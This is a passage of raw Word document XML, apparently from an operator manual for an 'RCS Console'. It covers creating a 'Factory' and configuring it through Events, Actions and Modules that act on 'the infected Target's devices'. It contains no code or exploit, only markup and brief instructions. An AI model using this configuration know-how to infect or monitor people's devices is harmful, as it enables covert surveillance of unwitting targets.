              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&gt; New Factory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5092" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009F3493" w:rsidRPr="00240B6F" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009F3493" w:rsidRPr="00240B6F" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009F3493" w:rsidRPr="00941484" w:rsidRDefault="009F3493" w:rsidP="009F3493">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00941484">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00941484">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="00941484">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Factory’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009F3493" w:rsidRPr="00941484" w:rsidRDefault="009F3493" w:rsidP="009F3493">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009F3493" w:rsidRPr="00941484" w:rsidRDefault="009F3493" w:rsidP="009F3493">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00941484">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00941484">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidRPr="00941484">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a not mandatory field to be used for storing additional information about the Factory.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009F3493" w:rsidRPr="00941484" w:rsidRDefault="009F3493" w:rsidP="009F3493">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009F3493" w:rsidRPr="00240B6F" w:rsidRDefault="009F3493" w:rsidP="009F3493">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00941484">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00941484">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="00941484">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows you to specify which type of </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Factory you’re about to create.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="009F3493">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="009F3493">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="009F3493">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the new Factory is created you can access the Basic mode configuration page (double-click) and then switch to the Advanced mode, </w:t>
      </w:r>
      <w:r w:rsidRPr="00820542">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">which allows to operate with a higher level of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>detail.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="009F3493">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4673"/>
        <w:gridCol w:w="284"/>
        <w:gridCol w:w="4671"/>
      </w:tblGrid>
      <w:tr w:rsidR="009F3493" w:rsidTr="00332A81">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9628" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>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134"/>
              <w:gridCol w:w="3134"/>
            </w:tblGrid>
            <w:tr w:rsidR="009F3493" w:rsidTr="00332A81">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3134" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w:rsidR="009F3493" w:rsidRDefault="003A4380" w:rsidP="00332A81">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:noProof/>
                      <w:lang w:eastAsia="it-IT"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:lang w:eastAsia="it-IT"/>
                    </w:rPr>
                    <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                      <v:shape id="_x0000_s1231" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:79.25pt;margin-top:3.8pt;width:46.25pt;height:36.85pt;z-index:251825152;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin">
                        <v:imagedata r:id="rId68" o:title=""/>
                        <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                      </v:shape>
                      <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1231" DrawAspect="Content" ObjectID="_1446455375" r:id="rId229"/>
                    </w:object>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3134" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="00332A81">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:noProof/>
                      <w:lang w:eastAsia="it-IT"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:lang w:eastAsia="it-IT"/>
                    </w:rPr>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E4DD6AF" wp14:editId="3B31F4EE">
                        <wp:extent cx="719122" cy="468000"/>
                        <wp:effectExtent l="0" t="0" r="5080" b="8255"/>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19122" cy="468000"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3134" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w:rsidR="009F3493" w:rsidRDefault="003A4380" w:rsidP="00332A81">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:noProof/>
                      <w:lang w:eastAsia="it-IT"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:lang w:eastAsia="it-IT"/>
                    </w:rPr>
                    <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                      <v:shape id="_x0000_s1232" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:5.55pt;margin-top:5.6pt;width:65.9pt;height:36.85pt;z-index:251826176;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin">
                        <v:imagedata r:id="rId71" o:title=""/>
                        <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                      </v:shape>
                      <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1232" DrawAspect="Content" ObjectID="_1446455376" r:id="rId230"/>
                    </w:object>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F3493" w:rsidTr="00332A81">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F3493" w:rsidTr="00332A81">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="068E23F5" wp14:editId="16062B26">
                  <wp:extent cx="1918800" cy="1151320"/>
                  <wp:effectExtent l="0" t="0" r="5715"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918800" cy="1151320"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05B20CAD" wp14:editId="1A9D0159">
                  <wp:extent cx="1919934" cy="1152000"/>
                  <wp:effectExtent l="0" t="0" r="4445"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919934" cy="1152000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F3493" w:rsidTr="00332A81">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009F3493" w:rsidRPr="00057420" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009F3493" w:rsidRDefault="00E17308" w:rsidP="00332A81">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.</w:t>
            </w:r>
            <w:r w:rsidR="009F3493">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
            <w:r w:rsidR="009F3493" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="009F3493">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009F3493" w:rsidRPr="00057420" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009F3493" w:rsidRDefault="00E17308" w:rsidP="00332A81">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.</w:t>
            </w:r>
            <w:r w:rsidR="009F3493">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3 </w:t>
            </w:r>
            <w:r w:rsidR="009F3493" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="009F3493">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>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tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00754335" w:rsidRDefault="00754335" w:rsidP="0018169C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="0018169C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B24482">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Each RCS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00B24482">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">actory configuration is based on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B24482">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> different types of elements:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Events, Actions and Modules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="0018169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266"/>
        <w:gridCol w:w="8211"/>
      </w:tblGrid>
      <w:tr w:rsidR="0018169C" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="870" w:dyaOrig="825">
                <v:shape id="_x0000_i1069" type="#_x0000_t75" style="width:42.75pt;height:40.5pt" o:ole="">
                  <v:imagedata r:id="rId75" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1069" DrawAspect="Content" ObjectID="_1446455284" r:id="rId233"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Event</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>An Event is a specific check that may be performed on the infected Target’s devices.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>To make an Event useful, it must invoke an Action, as soon as it occurred.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
